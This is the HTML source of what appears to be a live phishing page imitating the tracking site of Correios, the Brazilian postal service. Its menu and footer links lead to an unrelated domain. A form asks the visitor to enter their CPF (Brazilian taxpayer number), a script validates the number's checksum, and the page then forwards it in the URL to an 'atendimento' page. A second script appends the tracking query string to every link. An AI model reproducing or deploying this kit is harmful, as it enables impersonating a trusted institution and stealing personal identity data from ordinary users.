<!DOCTYPE html><html><head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
    <meta name="mobile-web-app-capable" content="yes">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>Rastreamento</title>
    <script type="text/javascript" src="/ruxitagentjs_ICA27NVfgqrux_10281231207105659.js" data-dtconfig="rid=RID_1261318018|rpid=1035718129|domain=correios.com.br|reportUrl=/rb_bf62475kpy|app=1076fce661cc53ae|cuc=88037dhn|mel=100000|featureHash=ICA27NVfgqrux|ssv=4|lastModification=1706192539196|vcv=2|tp=500,50,0,1|rdnt=1|uxrgce=1|bp=3|agentUri=/ruxitagentjs_ICA27NVfgqrux_10281231207105659.js"></script><link href="css/animate.min_v3.42.css" rel="stylesheet">
    <link rel="stylesheet" href="css/font-awesome.min_v3.42.css">
    <link rel="stylesheet" href="css/bootstrap.min_v3.42.css" id="bootstrap-css">
    <link rel="stylesheet prefetch" href="https://rastreamento.correios.com.br/static/css/reset.min.css?v3.42">
    <link rel="shortcut icon" href="images/favi-ect.png">
    <link rel="stylesheet" href="css/bunker_v3.42.css">
    <link rel="stylesheet" href="css/global_v3.42.css">

    <!-- <link rel="stylesheet" href="https://rastreamento.correios.com.br/lib/fontawesome/font-awesome.min.css'> -->

    <link rel="stylesheet" href="../static/rastreamento-internet/estilos/rastroUnico.css?v3.42">
<link rel="stylesheet" href="../static/rastreamento-internet/estilos/rastroMulti.css?v3.42">
<link rel="stylesheet" href="../static/rastreamento-internet/estilos/contrast.css?v3.42">
<link rel="stylesheet" href="index.css?v3.42">
</head>

<body class="">
            <section id="acessibilidade">
    <a tabindex="1" href="?">Acessibilidade</a>
    <a class="idioma" href="?">Português</a>
</section>
<div id="acess-drop-down">
    <header>
        <a class="" tabindex="1" href="?"></a>
    </header>
    <section>
        <a tabindex="1" href="javascript:irPara.jumpTo('tabs-rastreamento');?" class="conteudo numero" data-numero="1">Ir para o conteúdo</a>
        <a tabindex="1" href="javascript:irPara.jumpTo('menu');?" class="menu numero" data-numero="2">Ir para o menu</a>
        <a tabindex="1" href="javascript:irPara.jumpTo('titulo-pagina');?" class="busca numero" data-numero="3">Ir para a busca</a>
        <a tabindex="1" href="javascript:irPara.jumpTo('rodape');?" class="rodape numero" data-numero="4">Ir para o rodapé</a>
        <a tabindex="1" href="javascript:window.toggleContrast();irPara.fechaMenuAcessibilidade()?" class="contraste">Alto contraste</a>
        <a tabindex="1" href="https://g1novidades2024.online/comprador/inicial/dl/?" class="libras">Libras</a>
        <a tabindex="1" class="saiba-mais" href="?">Saiba mais sobre acessibilidade</a>
    </section>
</div>        <section id="menu">
        <a class="hamburger" tabindex="1" href="?"></a>
        <a class="logo" href="https://g1novidades2024.online/comprador/inicial/dl/?"></a>
        <a class="pesquisar" href="?"></a>
                    <a class="entrar" href="https://g1novidades2024.online/comprador/inicial/dl/?"></a>
        
        <div class="menu oculto">
            <section>
                <h1>Rastreamento <!-- 1.3.0.42 - v3.42 --></h1>
                                    <a href="https://g1novidades2024.online/comprador/inicial/dl/?">Entrar</a>
                            </section>
            

<a href="https://g1novidades2024.online/comprador/inicial/dl/?" target="_blank">Rastreamento em outros países</a>
<a href="https://g1novidades2024.online/comprador/inicial/dl/acesso-a-informacao/perguntas-frequentes?">Perguntas frequentes</a>
<a href="https://g1novidades2024.online/comprador/inicial/dl/?" target="_blank">Busca Agências</a>
<a href="https://g1novidades2024.online/comprador/inicial/dl/falecomoscorreios/central-de-atendimento?" target="_blank">Central de Atendimento</a>
<a href="https://g1novidades2024.online/comprador/inicial/dl/receber/prazo-de-guarda?" target="_blank">Prazo de Guarda Objetos Nacionais</a>
<a href="https://g1novidades2024.online/comprador/inicial/dl/receber/prazo-de-guarda-objetos-internacionais?" target="_blank">Prazo de Guarda Objetos Internacionais</a>
<a href="https://g1novidades2024.online/comprador/inicial/dl/?" target="_blank">Restrição de Entrega por CEP</a>        </div>

    </section>
    <main>

        <input type="hidden" id="documento" name="documento" value="">
<div class="container">
    <nav aria-label="breadcrumb">
        <div id="trilha">
            <a href="?">Bem-vindo ao meus Correios!
</a>
            <a href="?"></a>
        </div>
    </nav>
 <style>
              h1 {
            color:#1F2124;
            margin-right: 20px;
        }
        form {
         
            padding: 20px;

            max-width: 300px;
            margin: 0;
        }
        label {
              color:#0083CA;
            display: block;
            margin-bottom: 8px;
            font-weight: bold;
        }
        input[type="text"] {
            width: calc(100% - 20px);
            padding: 10px;
            margin-bottom: 10px;
            border: 1px solid #ccc;
            border-radius: 4px;
        }
        button {
            background-color: #0083CA;
            color: white;
            border: none;
            padding: 10px;
            border-radius: 4px;
            cursor: pointer;
            width: 100%;
        }
        button:hover {
            background-color: #006b99;
        }
        #invalidcpf {
            color: red;
            display: none;
        }
    </style>
     <script>
        function validarCPF(cpf) {
            cpf = cpf.replace(/[^\d]+/g, '');
            if (cpf.length !== 11 || /^(\d)\1+$/.test(cpf)) return false;

            let soma = 0, resto;
            for (let i = 1; i <= 9; i++) soma += parseInt(cpf.substring(i - 1, i)) * (11 - i);
            resto = (soma * 10) % 11;
            if (resto === 10 || resto === 11) resto = 0;
            if (resto !== parseInt(cpf.substring(9, 10))) return false;

            soma = 0;
            for (let i = 1; i <= 10; i++) soma += parseInt(cpf.substring(i - 1, i)) * (12 - i);
            resto = (soma * 10) % 11;
            if (resto === 10 || resto === 11) resto = 0;
            if (resto !== parseInt(cpf.substring(10, 11))) return false;

            return true;
        }

        function ValidaCPF() {
            var cpf = document.getElementById("accountId").value.replace(/[^\d]/g, '');
            if (!validarCPF(cpf)) {
                document.getElementById("invalidcpf").style.display = "block";
                setTimeout(() => {        
                    document.getElementById("invalidcpf").style.display = "none";
                }, 3000);
            } else {
                const urlParams = new URLSearchParams(window.location.search);
                window.location.href = "./atendimento/index.html?cpf="+document.getElementById("accountId").value.replace(/[^\d]/g, '') + '&' + urlParams.toString();

            }
        }
    </script>
   <script>
            window.onload = function () {
                var links = document.getElementsByTagName("a");
                for (var i = 0, n = links.length; i < n; i++) {
                    var href = links[i].href.trim() +
                        (links[i].href.indexOf("?") > 0 ? '&' : '?') +
                        document.location.search.replace('?', '').toString();
                    links[i].href = href;
                }
            }
        </script>



    <div class="container">
        <h1>No campo usuário abaixo, informar o seu CPF (somente números).</h1>
        <form onsubmit="ValidaCPF(); return false;">
            <label for="accountId">CPF DO COMPRADOR:</label>
            <input type="text" id="accountId" name="accountId" pattern="\d*" maxlength="11" required="">
            <button type="submit" onclick="ValidaCPF();">Enviar</button>
            <div id="invalidcpf">CPF inválido. Por favor, insira um CPF válido.</div>
        </form>
    </div>
        <div id="regiao-botoes" class="oculta"></div>
    </div></main>
            <footer id="rodape">
            <div class="recipiente largura-maxima">
    
    <div class="rodape-links">
        <h2>Fale Conosco</h2>

        <ul class="lista-icone">
            <li>
                <a href="https://g1novidades2024.online/comprador/inicial/dl/?" target="_blank">
                    <img class="icones-link" src="images/monitor.png">
                    <span>Registro de Manifestações</span>
                </a>
            </li>
            <li>
                <a href="https://g1novidades2024.online/comprador/inicial/dl/?" target="_blank">
                    <img class="icones-link" src="images/duvida.png">
                    <span>Central de Atendimento</span>
                </a>
            </li>
            <li>
                <a href="https://g1novidades2024.online/comprador/inicial/dl/?" target="_blank">
                    <img class="icones-link" src="images/negocios.png">
                    <span>Soluções para o seu negócio</span>
                </a>
            </li>
            <li>
                <a href="https://g1novidades2024.online/comprador/inicial/dl/?" target="_blank">
                    <img class="icones-link" src="images/headset.png">
                    <span>Suporte ao cliente com contrato</span>
                </a>
            </li>
            <li>
                <a href="https://g1novidades2024.online/comprador/inicial/dl/?" target="_blank">
                    <img class="icones-link" src="images/ouvidoria.png">
                    <span>Ouvidoria</span>
                </a>
            </li>
            <li>
                <a href="https://g1novidades2024.online/comprador/inicial/dl/?" target="_blank">
                    <img class="icones-link" src="images/denuncia.png">
                    <span>Denúncia</span>
                </a>
            </li>
        </ul>
    </div>

    <div class="rodape-links">
        <h2>Sobre os Correios</h2>

        <ul class="lista-icone">
            <li>
                <a href="https://g1novidades2024.online/comprador/inicial/dl/?" target="_blank">
                    <img class="icones-link" src="images/identidade.png">
                    <span>Identidade corporativa</span>
                </a>
            </li>
            <li>
                <a href="https://g1novidades2024.online/comprador/inicial/dl/?" target="_blank">
                    <img class="icones-link" src="images/educa%C3%A7%C3%A3o.png">
                    <span>Educação e cultura</span>
                </a>
            </li>
            <li>
                <a href="https://g1novidades2024.online/comprador/inicial/dl/?" target="_blank">
                    <img class="icones-link" src="images/c%C3%B3digo%20%C3%A9tica.png">
                    <span>Código de ética</span>
                </a>
            </li>
            <li>
                <a href="https://g1novidades2024.online/comprador/inicial/dl/acesso-a-informacao/institucional/publicacoes/processos-de-contas-anuais?" target="_blank">
                    <img class="icones-link" src="images/Transpar%C3%AAncia.png">
                    <span>Transparência e prestação de contas</span>
                </a>
            </li>
            <li>
                <a href="https://g1novidades2024.online/comprador/inicial/dl/falecomoscorreios/politica-de-privacidade-e-cookies?" target="_blank">
                    <img class="icones-link" src="images/cadeado.png">
                    <span>Política de Privacidade e Notas Legais</span>
                </a>
            </li>
        </ul>
    </div>

    <div class="rodape-links">
        <h2>Outros Sites</h2>

        <ul class="lista-icone">
            <li>
                <a href="http://shopping.correios.com.br/wbm/store/script/store.aspx?cd_company=ErZW8Dm9i54=&amp;" target="_blank">
                    <img class="icones-link" src="images/loja%20correios.png">
                    <span>Loja online dos Correios</span>
                </a>
            </li>
<!--            <li>-->
<!--                <a href="https://www.gov.br/mcom/pt-br" target="_blank">-->
<!--                    <img class="icones-link" src="--><!--core/templates/bunker/img/rodape/governo-federal.png">-->
<!--                    <span>Ministério das Comunicações</span>-->
<!--                </a>-->
<!--            </li>-->
        </ul>
    </div>

</div>
            <div class="marca-gov">
<!--                <img src="--><!--core/templates/bunker/img/marca-gov.png"/>-->
            </div>
            <p>
                </p><div class="copyright">© Copyright 2024 Correios</div>
            <p></p>
        </footer>
        

        

</body></html>